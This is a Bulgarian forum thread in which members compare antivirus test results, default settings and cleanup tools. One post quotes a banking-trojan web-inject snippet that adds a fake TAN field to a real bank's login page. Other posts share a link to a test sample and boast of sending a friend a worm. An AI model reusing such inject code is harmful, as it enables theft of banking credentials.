Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

Резултати от тестове на софтуер за защита - 2 част

Featured Replies

Тествайте

http://www50.zippyshare.com/v/96098162/file.html

Реших да пробвам Комодо,да видя какви ще ги свърши,при стартиране на файла:

Публикувано изображение

Натискане на бутона разреши,програмата се инсталира,при опит за стартиране на вече инсталираната програма:

Публикувано изображение

• Отговори 2,2k
  • Прегледи 150,9k
  • Създадено
  • Последен отговор

Av Comparatives Test

Днес се заех да разгледам по-обстойно тестовете на AV Comparatives.

До сега им бях "хвърляла" набързо по едно око и за първи път събрах доста информация от тестовете им.

Както знаете Av Comparatives правят различни тестове през цялата година.Тестовете са :

- Retrospective/Proactive Test

- Whole Product Dynamic Test

- False Alarm Test

- Removal Test

- Potentially Unwanted Applications .....

Аз следих от 2010 насам развитието на всичките АВ и искам да споделя това което аз забелязах.

Оn demand scan test забелязвам,че засичат предимно еврестичните Антивируси ,GData,Avira Eset,Avast........

Или това са файлове(мостри) които са вече изтеглени от Интернет и са примерно архивирани,тоест Антивирусът не ги е сканирал в реално време.И тук Антивирусите които имат развити евристики се открояват веднага от тези които нямат чак такива евристики.

Публикувано изображение

Обаче ако погледнем динамичните тестове,тоест на защитата в реално време картинката малко се променя.И тя се променя защото тези които нямат,чак такива развити евристики са със други добавки.

Облачни технологии,пясъчници,hips\behavior blocker и.т.н.Internet Security

Тук няма как да не разпознаем Kaspersky,Norton,Eset,PC Tools....

На тези "Динамични" тестове се включват веднага изброените по-горе помощни средства на Антивирусите и разбира се резултатът се променя веднага.Обаче има една подробност,че за да се получи този резyлтат то зависи от потребителя също.Ако hipsа на Kaspersky или Нортон засече нещо то ние трябва да вземем адекватно решение.

Публикувано изображение

Публикувано изображение

Тоест добре е да има даден Антивирус силна Евристика,но само с евристика не става в днешни дни.

Ако се вгледаме в таблото ще видим че Kaspersky и Нортон имат постоянно високо ниво.

В теста Potentially Unwanted Applications Там пак имаме различен резултат,но сякаш пак се открояват еврестичните програми(без Hортон които е на 2-ро място а е дефиниционна програма)

Публикувано изображение

И накрая ще добавя теста от 2009(от 2010 няма)Removal Test

Тук знаем,че ако даден Антивирус пропусне то върви,че го чисти с него.Болшинството са зле.Трябва специални програмки,тyлчета и т.н.Но има и такъв тест и се вижда ,че Нортон ,Kaspersky и Microsoft Security Essential се справят най-добре(за 2009)

Публикувано изображение

Надявам се да ви е допаднал моят обзор.И да направите правилният избор от към програма за себе си.:cool:

Редактирано от Coccinelle (преглед на промените)

На мен ми прави лошо впечатление, че няма Removal Test от 3 години. Със сигурност положението днес е различно. В последните два-три месеца сканирам на ден по три и повече проби на ден и вземайки данни от колегите в темата за подпомагане за другите приложения, както и резултати от virus total, съм на мнение, че за on-demand scan резултатите av comparatives не отчитат много коректно относно ЕСЕТ (а те не отчитат ли коректно за едни, едва ли за другите всичко е ок). Но, разбира се с уговорката, че аз съм направил промени в конфигурацията на НОД... И има един досаден пропуск в дефолт настройките на словаците - опцията за засичане на PUA не е отметната. Подборът на тествани продукти на avcomparatives също ми е ... хм. Но от друга страна обосновката на самите тестове е детайлна. Казват ти условията на тестване и т.н. Не да изпляскат една таблица просто.

Редактирано от metodidamianov (преглед на промените)

На мен ми прави лошо впечатление, че няма Removal Test от 3 години. Със сигурност положението днес е различно.

В последните два-три месеца сканирам на ден по три и повече проби на ден и вземайки данни от колегите в темата за подпомагане за другите приложения, както и резултати от virus total, съм на мнение, че за on-demand scan резултатите av comparatives не отчитат много коректно относно ЕСЕТ (а те не отчитат ли коректно за едни, едва ли за другите всичко е ок). Но, разбира се с уговорката, че аз съм направил промени в конфигурацията на НОД...

И има един досаден пропуск в дефолт настройките на словаците - опцията за засичане на PUA не е отметната.

Подборът на тествани продукти на avcomparatives също ми е ... хм.

Но от друга страна обосновката на самите тестове е детайлна. Казват ти условията на тестване и т.н. Не да изпляскат една таблица просто.

Аз направих резюме на техните тестове.Все пак при тях се тестват програмите при настройки по-подразбиране.

Моите уважения към Nod,но той не се справя много добре на заразени системи.Да не ти казвам,че всички не справят въобще.Задължително трябва да се чисти с други специализирани програмки.

Моите уважения към Nod,но той не се справя много добре на заразени системи.

И не само той Avira,Avast!,Eset,AVG - те не са направени с цел да излекуват системата, а само да я предпазят.

За това за заразени системи - Dr.Web CureIt! http://www.freedrweb.com/download+cureit/gr/

TDSSKiller - http://support.kaspersky.com/downloads/utils/tdsskiller.zip

GMER - http://www.gmer.net//

Malwarebytes' Anti-Malware - http://software-files-l.cnet.com/s/software/11/66/56/48/mbam-setup-1.50.1.1100.exe?e=1305844518&h=ab3ad85759838e679b621cbdf9f9bf1e&lop=link&ptype=1901&ontid=8022&siteId=4&edId=3&spi=c11a1a71d64d22ecfba23b30eeffb198&pid=11665648&psid=10804572&fileName=mbam-setup-1.50.1.1100.exe

Един приятел с Windows 7 Ultimate(x64) и Avast HOME 6 (по моя препоръка и инсталиран от мене) се оплакваше от проблеми със старта и работата на системата като цяло. Чистил,чистил с Аваст и след като се поговорихме му предложих да инсталира Eset Nod32 тъй като е абонат на Виваком и тя му е безплатна. Инсталирал човека,Нод и сканирал компа...Намерени с NOD 227 зарази - всички в C:\Program Files с един НОД не успял да се справи давал му,че не може да го изтрие. Успял да го изтрие ръчно. Не съм виждал лога,нито пък компа засега,но като го видя ще го прегледам и ще дам логовете ако е необходимо. За да няма лафове от типът на празни приказки...

Евристиката на НОД е добра,засичането е добро но както каза metodidamianov

И има един досаден пропуск в дефолт настройките на словаците - опцията за засичане на PUA не е отметна

Това не е само при НОД - това е при Касперски,Авира,Аваст...което не ги прави лоши програми но трябва да се пипа тук и там. А,потребителите не пипат,те дори и не знаят какво инсталират понякога. Такива програми и изобщо софтуер се инсталира от по-напреднали потребители затова тези тестове с настройки по-подразбиране са безсмислени.А,на заразени системи ако тръгне да се слага тепърва антивирус...просто е смешно това.

Това е моето мнение.

Един приятел с Windows 7 Ultimate(x64) и Avast HOME 6 (по моя препоръка и инсталиран от мене) се оплакваше от проблеми със старта и работата на системата като цяло. Чистил,чистил с Аваст и след като се поговорихме му предложих да инсталира Eset Nod32 тъй като е абонат на Виваком и тя му е безплатна. Инсталирал човека,Нод и сканирал компа...Намерени с NOD 227 зарази - всички в C:\Program Files с един НОД не успял да се справи давал му,че не може да го изтрие.

Представям си що за потребител е тогава...освен, ако се заразява съзнателно.

Nod, ако ще 1000 да е открил след avast! това нищо не значи за мен.

Относно настройките по-подразбиране не само за антивирусната е така и за Windows е добре да се пипнат настройките.

Един приятел с Windows 7 Ultimate(x64) и Avast HOME 6 (по моя препоръка и инсталиран от мене) се оплакваше от проблеми със старта и работата на системата като цяло. Чистил,чистил с Аваст и след като се поговорихме му предложих да инсталира Eset Nod32 тъй като е абонат на Виваком и тя му е безплатна. Инсталирал човека,Нод и сканирал компа...Намерени с NOD 227 зарази - всички в C:\Program Files с един НОД не успял да се справи давал му,че не може да го изтрие. Успял да го изтрие ръчно. Не съм виждал лога,нито пък компа засега,но като го видя ще го прегледам и ще дам логовете ако е необходимо. За да няма лафове от типът на празни приказки...

Евристиката на НОД е добра,засичането е добро но както каза metodidamianov

Това не е само при НОД - това е при Касперски,Авира,Аваст...което не ги прави лоши програми но трябва да се пипа тук и там. А,потребителите не пипат,те дори и не знаят какво инсталират понякога. Такива програми и изобщо софтуер се инсталира от по-напреднали потребители затова тези тестове с настройки по-подразбиране са безсмислени.А,на заразени системи ако тръгне да се слага тепърва антивирус...просто е смешно това.

Това е моето мнение.

Миналата седмица ходихме на гости на моят мъж на един приятел и аз гледам,че компютърът му иска обновяване и го питам ,защо не го обновява а той ми казва,че постоянно му излизал прозорец и той го затварял...Страх го било да не направил нещо на компа.

Та той беше с Аvast, и Аvast беше версия 5.

Аз го питам защо не е сложил последната версия и той ми казва :ами той всеки ден си слага сам.

Той си мисли ,че Аvast когато казва ,че антивирусната база е обновена се инсталира нова версия.:offtopic_s:

Относно настройките по-подразбиране не само за антивирусната е така и за Windows е добре да се пипнат настройките.

Не мога да си изкривя душата и да кажа,че Nod е болкук ,защото го пробвам постоянно.Има си слабости но по отношение блокиране на вредонощно URL си е много добре.

Миналата седмица ходихме на гости на моят мъж на един приятел и аз гледам,че компютърът му иска обновяване и го питам ,защо не го обновява а той ми казва,че постоянно му излизал прозорец и той го затварял...Страх го било да не направил нещо на компа.

Та той беше с Аvast, и Аvast беше версия 5.

Аз го питам защо не е сложил последната версия и той ми казва :ами той всеки ден си слага сам.

Той си мисли ,че Аvast когато казва ,че антивирусната база е обновена се инсталира нова версия.:offtopic_s:

Такива с лопата да ги ринеш...ако им кажеш кликни тук и те ще кликнат, а може и да стартират нещо...аз така се пошегувах с един познат, написах му виж тази снимка (като знаех с какъв антивирус е) и му дадох линк към червей просто да видя реакцията му...и той наистина го стартира.

А коментара "Страх го било да не направил нещо на компа" за windows update - пълна глупост.

Такива с лопата да ги ринеш...ако им кажеш кликни тук и те ще кликнат, а може и да стартират нещо...аз така се пошегувах с един познат, написах му виж тази снимка (като знаех с какъв антивирус е) и му дадох линк към червей просто да видя реакцията му...и той наистина го стартира.

А коментара "Страх го било да не направил нещо на компа" за windows update - пълна глупост.

Нормално е .Не са всички луди като нас да ровим постоянно.Хората отварят компа чатят малко,свалят един филм и това е.

Може би ние не сме нормалните.:whist:

Нормално е .Не са всички луди като нас да ровим постоянно...

В доста случаи, човек продължава да търси, когато не е намерил...

Като хоби е забавно, но резултатите могат да те отчаят ако се надяваш да откриеш Решението.

Която и да е програмата, с малко познания, логика и доза усет е добре да си я държиш щом си си решил, че това е програмата за теб и не е добре да я сменяш само щото еди-кой си бил написал/казал нещо.

Ако след 2006 Панда не се скриха сигурно още щях да съм с техен продукт. Не разбрах какво стана с испанците...

Нормално е .Не са всички луди като нас да ровим постоянно.Хората отварят компа чатят малко,свалят един филм и това е.

Може би ние не сме нормалните.:wub:

Не е точно така. Въпросният колега,за който писах например е маниак на тема музика,слуша и гледа онлайн. Вчера ми каза "Повече в руски сайтове не влизам!!!" Там страниците крият страшно много уловки,пренасочващи връзки и т.н. Във Фейса също не е безопастно.

Истината е,че на хората не са информирани какво могат да загубят,масово не ползват антивирусни програми понеже спецове ги съветват,че щели да им бавят компютъра. И така до следващата преинсталация - правена от същите тези спецове.

Всеки ден на служебен комп засичам зарази които във Вирус Тотал се засичат поне на 90%,днес една даскалка по информатика идва със заразена флашка.Дори не се впечатли,че е Кидо.

В Office 1 Superstore колкото пъти отида - толкова пъти чистя флашката. Та...ясно е кой не е наред.

Редактирано от nikssi (преглед на промените)

Аз не казвам,че не е нормално да не се интересyваш,но ние стоим понякога до посред нощите да ровичкаме и чоплим.Това е малко лудост. Малко сме в крайност....,че на всичко отгоре чак се караме с колегите в форума за програмки сякаш ни плащат за това.Ето това също е лудост.:ph34r:

Аз съм фен на Аваст,затова му го инсталирах.. Човека не е много в час,учи и тепърва се сблъсква с такива неща като "злонамерени програми". Но се учи бързо и най хубавото е,че тества НОД тъй както се ползва от потребителите. Да видим след някой месец какво ще откриеме. Доброволец. :P

Аз не казвам,че не е нормално да не се интересyваш,но ние стоим понякога до посред нощите да ровичкаме и чоплим.Това е малко лудост.

Малко сме в крайност....,че на всичко отгоре чак се караме с колегите в форума за програмки сякаш ни плащат за това.Ето това също е лудост.:ph34r:

Може да се каже,че е патологично състояние.

За лудостта - преди време братовчет ми,който работеше,като невролог на четвъртият километър в София ме заведе на гости на свой колега.

Психиатър - ми човека си имаше дървен кон в естесвена големина в едната стая и го яздеше...Луд фен на уестърна беше.Стаята му представляваше един мини град от дивият запад...Та той ми смига и вика - всеки е луд на някаква тема. Аз на тема уестърн - ти на тема фотография. :hush: Сега още една патологична болест ме прихваща...по скоро вече съм я минал. Това,че споря е защото в повечето случаи се пишат изсмукани неща,преписани или чути от съседна маса в нечие кръчме. В повечето сериозни форуми такива офтопик мения се трият - и има вечен без никакво предупреждение. :ph34r:

Редактирано от nikssi (преглед на промените)

Истината е,че на хората не са информирани какво могат да загубят,масово не ползват антивирусни програми понеже спецове ги съветват,че щели да им бавят компютъра. И така до следващата преинсталация - правена от същите тези спецове.

Всеки ден на служебен комп засичам зарази които във Вирус Тотал се засичат поне на 90%,днес една даскалка по информатика идва със заразена флашка.Дори не се впечатли,че е Кидо.

В Office 1 Superstore колкото пъти отида - толкова пъти чистя флашката. Та...ясно е кой не е наред.

То пък в повечето фирми/училища/районни управления и др. са с компютри морално остарели 7-8 годишни, кои са взети 2-ръка, кои конфискувани...

Мен ще ми е неудобно да не кажа де мотивиращо да седна на такъв компютър и да поработя.

Не понасям ограниченията в смисъл някои да ми поставя правила как да работя, особено на компютър.

Да ти кажа относно специалистите има логика в това за без антивирусна, но само за специалист и е грешно да препоръчват без, защото е ясно, че не всеки разбира от файлови разширения програмиране и прочие.

Да ти кажа относно специалистите има логика в това за без антивирусна, н...

Ммммне... Тоест без програма за сигурност. Може да ползваш само виртуализираща програма над системният дял само, но ще трябва да съхраняваш на външен носител или другаде допълнително информация и... въобще малко сложно...и тегаво.

Най-добре да си имаш един админ. :whist::baby:

Без никаква защита и само с една муска до компютъра и подкова на монитора, не бива.

Един път ще стане белята примерно, само веднъж и по закона на Мърфи ще е дебела беля.

Моят комп примерно навсякъде разправям, че е будист. След два токови удара, заминаха последователно дъно, а след това и хард, много откъснати косми от косата ми и съкратени нерви.

Вече всичко важно ми е в Мрежата или на дивидита или на двете места. Когато и да се "срути" пак компа за нищо няма да съжалявам... Но не бих го оставил без никаква защита... софтуерна, де.

То пък в повечето фирми/училища/районни управления и др. са с компютри морално остарели 7-8 годишни, кои са взети 2-ръка, кои конфискувани...

Мен ще ми е неудобно да не кажа де мотивиращо да седна на такъв компютър и да поработя.

Не понасям ограниченията в смисъл някои да ми поставя правила как да работя, особено на компютър.

Да ти кажа относно специалистите има логика в това за без антивирусна, но само за специалист и е грешно да препоръчват без, защото е ясно, че не всеки разбира от файлови разширения програмиране и прочие.

Наскоро си взех чисто нов неупотребяван морално остарял комп - ThinkPad T43. Лаптопът е отпреди пет години, но има леки преимущества пред новите пласмасарки. За разлика от теб аз харесвам ограниченията. Та този лаптоп го взех само заради клавиатурата и заради това, че ме кефи екранчето 4:3.

По повод на специалистите без програма за сигурност - нагледах на волни съчетания в този раздел. Радост за окото. :whist:

Досега индексирането в порталите за тестове на програми сигурност не е довело до съществена промяна в класацията, която правихме тук преди около пет-шест години. Това е...

Аз викам и ние да направим подобен тест, понеже не мога да повярвам, че Авира е по-бърза при "on demand" сканирането, отколкото Аваст.Доста пъти съм пробвал в домашни условия и твърдя обратното.

Може да ползваш само виртуализираща програма над системният дял

...и си търси паролите в някой C&C сървър :whist:

или пък това...

set_url https://probanking.procreditbank.bg/main/main.asp* GP

data_before

name="uPSW"*/>

data_end

data_inject

<br />

<div class="lab">

<label for="uPSW">tan</label>

</div>

<input name="tan" type="password" class="edit" id="uPSW" size="16" maxlength="8"/>

data_end

data_after

data_end

data_before

name="Submit"

data_end

data_inject

OnClick="javascript: if (document.forms[0].tan.value.length < 3) {

alert('грешна tan');return false;}"

data_end

data_after

data_end

Редактирано от Гост (преглед на промените)

Аз викам и ние да направим подобен тест, понеже не мога да повярвам, че Авира е по-бърза при "on demand" сканирането, отколкото Аваст.Доста пъти съм пробвал в домашни условия и твърдя обратното.

Може стига да има желаещи .

Аз пък не знаех ,че АVG е бърза и сканира по бързо от Аvast,Есет и Нортон.GData при първо сканиране на компа е нормана но 2-ро сканиране бие всички (които не вярва да пробва новата 2012)

Това, че AVG сканира бързо не е толкова важно. AVG напоследък се дъни страшно, трудно се деинсталира, буквално съсипва системата. Ето една справка: тук. Направо брадясах, докато почистя след тази бъгавия, наречена AVG. Даже не плеър, по-лошо...

Това, че AVG сканира бързо не е толкова важно. AVG напоследък се дъни страшно, трудно се деинсталира, буквално съсипва системата. Ето една справка: тук. Направо брадясах с тази бъгавия, наречена AVG. Даже не плеър, по-лошо...

Тя мудно чисти програмата bugg-ва понякога и постоянно иска рестарт.

Не знам защо излизат такива тестове постоянно.Тези руските тестове са винаги много странни.

antimalware.ru e форума на Касперски. Да не говорим как са изпраскали Trend Micro, Avast, Avira и т.н. без версия, модел, ами резултата от теста за влияние на антивируса при стартиране на системата не е верен. Как ТрендМайкро се зарежда по-бързо от Майкрософт, Нортън, Нод и ПиСи Тулз... Разбира се, ако имат предвид HijackThis на ТрендМайкро... може. Всъщност, TrendMicroIS 2009 беше бърза и не пречеше на компютъра... Емсисофт също въобще не зарежда бързо. За времето на он-деманд скана на Комодо - изкарват го супер бавен... И от това, което съм виждал на 2 компютъра с различни параметри и процесори, Панда торрмози ужасно системата при старт, много повече от Нортън.

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    26%
    Дарени 256.00 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.